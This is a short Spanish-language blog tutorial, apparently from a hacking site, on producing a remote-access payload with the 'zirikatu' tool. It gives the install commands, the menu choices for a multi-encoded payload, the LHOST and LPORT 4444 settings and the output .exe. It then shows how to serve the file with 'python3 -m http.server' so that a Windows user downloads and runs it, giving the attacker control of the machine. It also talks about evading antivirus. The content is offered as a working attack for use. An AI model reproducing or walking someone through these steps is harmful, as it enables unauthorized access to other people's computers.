Advertisement

header ads

MÉTEME UN EXPLOIT RÁPIDO Y SIN PROTECCIÓN

Hace un par de días he estado publicando en mi historial de INSTAGRAM sobre algunos exploit que estoy manejando pero he dado la sorpresa que todo esos exploit tiene un problema y eso vamos a ver.

Obviamente este tutorial no es para que tu hagas un maldito BYPASS con un antivirus actualizado o con un WINDOWS 10 con todas las reglas de seguridad, obviamente los exploit para hacer un bypass con un antivirus sera solo un paso porque al llegar ser publico siempre habrá compañías que intenten capturarlos. Como por ejemplo en el curso de #offsec hay un pequeño tips para intentar evadir eso pero no he llegado a publicarlo porque el tema es demasiado largo.
Pero publicare esta herramienta porque es muy fácil y todo automatizado si quiere hacer algo rápido y preciso.

INSTALACIÓN

sudo apt-get install mono-devel
https://github.com/pasahitz/zirikatu.git
chmod +x zirikatu.sh
./zirikatu.sh
Primero te aparece que tipo de exploit queréis entonces vos podes decidir en mi caso he decidió el numero 7 [7] Multi encode payload.
Luego elegimos el numero de iteración en mi caso 48 o podes usar 500.
Colocamos LHOST (TU IP de tu maquina local)
Colocamos LPORT 4444

Dice si querés cambiar la carga útil le colocamos un (Y)
Un mensaje de error (NO)
Ingrese el nombre del archivo de salida: creadpag
Luego comenzará a cargar y el archivo estará guardado en /root/Desktop/zirikatu/output/creadpag.exe
Ahora te dirá si quieres correr el payload handler, obviamente le dirás que si y ese es todo automático entonces te vas a un windows y compartes el archivo creado.
python3 -m http.server
IP:8000
Ahora solo lo descargamos y ejecutamos y listo el programa tiene acceso a tu windows, no te olvides en compartirlo y haber si luego me animo a publicar como hacer un bypass para WINDOWS.

Publicar un comentario

0 Comentarios